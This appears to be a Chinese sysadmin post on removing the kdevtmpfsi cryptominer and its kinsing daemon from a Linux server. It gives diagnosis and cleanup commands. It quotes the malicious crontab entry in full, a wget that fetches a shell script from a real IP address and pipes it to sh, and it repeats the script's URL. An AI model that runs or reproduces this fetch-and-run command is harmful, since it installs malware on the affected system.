服務器CPU資源佔用一直處於100%的狀態,檢查發現是kdevtmpfsi佔用導致的,此進程爲挖礦程序。
處理步驟如下:
kdevtmpfsi 進程處理:
1、# top
查看cpu佔用情況,找到佔用cpu的進程 最後是 kdevtmpfsi
2、# netstat -natp
根據上面的進程名查看與內網的 tcp 鏈接異常 ,看到陌生ip,查出爲國外ip,估計主機被人種後門了
此時,挖礦腳本大概率定時在你的crontab裏面。
crontab -l ,發現異常定時任務,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
有興趣可以研究這個sh腳本 http://195.3.146.118/unk.sh
3、解決方法
kdevtmpfsi有守護進程,單獨kill掉 kdevtmpfsi 進程會不斷恢復佔用。守護進程名稱爲 kinsing,需要kill後才能解決問題。
#查詢關聯的守護進程
[root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854
● session-5649.scope - Session 5649 of user root
Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-5649.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago
CGroup: /user.slice/user-0.slice/session-5649.scope
├─ 2854 /tmp/kdevtmpfsi
└─18534 ./kinsing1oZIY4Aid7
具體命令:
systemctl status 23437
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
kill -9 23437
kill -9 18534
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 記得這個守護進程的文件也要刪掉,找不到的話,也可以用這個命令
find / -name kdevtmpfsi
find / -name kinsing
進入/var/spool/cron 查看是否有相關的木馬定時任務在執行 有的話刪掉再重啓下crontab
